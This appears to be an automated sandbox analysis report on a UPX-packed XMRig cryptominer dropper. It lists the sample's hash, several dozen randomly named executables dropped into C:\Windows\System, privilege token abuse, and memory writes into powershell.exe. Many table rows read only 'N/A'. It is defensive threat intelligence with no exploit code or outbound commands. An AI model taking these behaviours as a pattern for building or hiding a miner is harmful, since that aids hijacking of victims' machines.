Malware Analysis Report

2024-09-10 13:57

Sample ID 240613-qbtnbazeje
Target 7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe
SHA256 81e475626b0f5685dc027c877f31a63069d681a15322426b4cd8917694988ae3
Tags
upx miner xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

81e475626b0f5685dc027c877f31a63069d681a15322426b4cd8917694988ae3

Threat Level: Known bad

The file 7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

Xmrig family

XMRig Miner payload

xmrig

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

UPX packed file

Executes dropped EXE

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-13 13:05

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 13:05

Reported

2024-06-13 13:08

Platform

win7-20240221-en

Max time kernel

150s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\ugdcyMP.exe N/A
N/A N/A C:\Windows\System\JfgLGHW.exe N/A
N/A N/A C:\Windows\System\AGVmJaZ.exe N/A
N/A N/A C:\Windows\System\DziatgR.exe N/A
N/A N/A C:\Windows\System\MSaQWKO.exe N/A
N/A N/A C:\Windows\System\MABiMax.exe N/A
N/A N/A C:\Windows\System\dJDbpxk.exe N/A
N/A N/A C:\Windows\System\yyIEfSj.exe N/A
N/A N/A C:\Windows\System\teDwzKF.exe N/A
N/A N/A C:\Windows\System\kjcOpML.exe N/A
N/A N/A C:\Windows\System\WtEsAsF.exe N/A
N/A N/A C:\Windows\System\nKIPfDj.exe N/A
N/A N/A C:\Windows\System\wcuFeQH.exe N/A
N/A N/A C:\Windows\System\OEcZzup.exe N/A
N/A N/A C:\Windows\System\zrKPWlk.exe N/A
N/A N/A C:\Windows\System\yQATNuk.exe N/A
N/A N/A C:\Windows\System\SYKMGRl.exe N/A
N/A N/A C:\Windows\System\jLZiWFK.exe N/A
N/A N/A C:\Windows\System\jxAvUkM.exe N/A
N/A N/A C:\Windows\System\AvxBQdq.exe N/A
N/A N/A C:\Windows\System\jTcWSGa.exe N/A
N/A N/A C:\Windows\System\ahoTtEV.exe N/A
N/A N/A C:\Windows\System\sNqMiiZ.exe N/A
N/A N/A C:\Windows\System\TycqBwB.exe N/A
N/A N/A C:\Windows\System\EiiDYHh.exe N/A
N/A N/A C:\Windows\System\sgDfEfG.exe N/A
N/A N/A C:\Windows\System\DNkGzzA.exe N/A
N/A N/A C:\Windows\System\dYvTSwE.exe N/A
N/A N/A C:\Windows\System\DUcRXOH.exe N/A
N/A N/A C:\Windows\System\eYWkAcm.exe N/A
N/A N/A C:\Windows\System\yEXWWEx.exe N/A
N/A N/A C:\Windows\System\fcqXfls.exe N/A
N/A N/A C:\Windows\System\KZrzXHc.exe N/A
N/A N/A C:\Windows\System\DeOuVgp.exe N/A
N/A N/A C:\Windows\System\EQzRpRG.exe N/A
N/A N/A C:\Windows\System\oRDWdew.exe N/A
N/A N/A C:\Windows\System\JETKhCT.exe N/A
N/A N/A C:\Windows\System\drshuKh.exe N/A
N/A N/A C:\Windows\System\OLTgaWi.exe N/A
N/A N/A C:\Windows\System\WiWXfHk.exe N/A
N/A N/A C:\Windows\System\OaxRYtT.exe N/A
N/A N/A C:\Windows\System\OdoyAaD.exe N/A
N/A N/A C:\Windows\System\QXsNSuR.exe N/A
N/A N/A C:\Windows\System\Uahsski.exe N/A
N/A N/A C:\Windows\System\dKYIowa.exe N/A
N/A N/A C:\Windows\System\EyYPRvH.exe N/A
N/A N/A C:\Windows\System\OROYZAq.exe N/A
N/A N/A C:\Windows\System\AekkuuD.exe N/A
N/A N/A C:\Windows\System\atvrXOX.exe N/A
N/A N/A C:\Windows\System\OatHwKk.exe N/A
N/A N/A C:\Windows\System\AXpupuT.exe N/A
N/A N/A C:\Windows\System\QkgxdVy.exe N/A
N/A N/A C:\Windows\System\GzrSltU.exe N/A
N/A N/A C:\Windows\System\vJOFXFw.exe N/A
N/A N/A C:\Windows\System\kjUwFFP.exe N/A
N/A N/A C:\Windows\System\PotqswV.exe N/A
N/A N/A C:\Windows\System\dCVNxqc.exe N/A
N/A N/A C:\Windows\System\ooGEDoh.exe N/A
N/A N/A C:\Windows\System\fYRataX.exe N/A
N/A N/A C:\Windows\System\IbCeMzq.exe N/A
N/A N/A C:\Windows\System\fpSjZZH.exe N/A
N/A N/A C:\Windows\System\kpFoNHM.exe N/A
N/A N/A C:\Windows\System\WOCmCbL.exe N/A
N/A N/A C:\Windows\System\LaQCicw.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\MlqVleQ.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\DjuGqVa.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UZDOdVW.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HnsgScX.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\shBszBh.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\aOgaaaj.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IITZnLw.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\sgRONvb.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JgDtCEn.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ABFtMGI.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\anSHoeB.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MrWEYvX.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qibPlox.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MnwsIhY.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SfTarRX.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WQeJgRH.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TnVXZBd.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tVPSYZN.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gDAsLtq.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SAhemRK.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BBdRRmY.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vGVIOaf.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vLsAomo.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PbsZvKJ.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gXnlHsU.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lIDFVkJ.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\DvYsqdP.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zNBejhs.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ekmkQnK.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vJOFXFw.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NFSHjYL.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yIuMGxV.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SkJWBvZ.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pdcrPnL.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hcwaanq.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TVdsBXw.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yqzbYEP.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vZxIASf.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YMCenAT.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bPTNrZD.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\fRQdGGF.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\Khsjiwq.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\DXcqKNN.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IaQJsia.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yjgpfaJ.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ULyGrxh.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\eHzCPOV.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\dOGwUTs.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\aHjoVul.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pGybBlz.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\VQYtfop.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\koBBwla.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zXGeKGD.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\dkESGWe.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\oZIYYcd.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AYPekAy.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lcIabsz.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JpnwsGR.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ygEUUtD.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\uTaKELY.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QCYhsxU.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SErlwEP.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OjjRQzT.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SzgLglH.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2336 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2336 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2336 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2336 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\ugdcyMP.exe
PID 2336 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\ugdcyMP.exe
PID 2336 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\ugdcyMP.exe
PID 2336 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\dJDbpxk.exe
PID 2336 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\dJDbpxk.exe
PID 2336 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe C:\Windows\System\dJDbpxk.exe
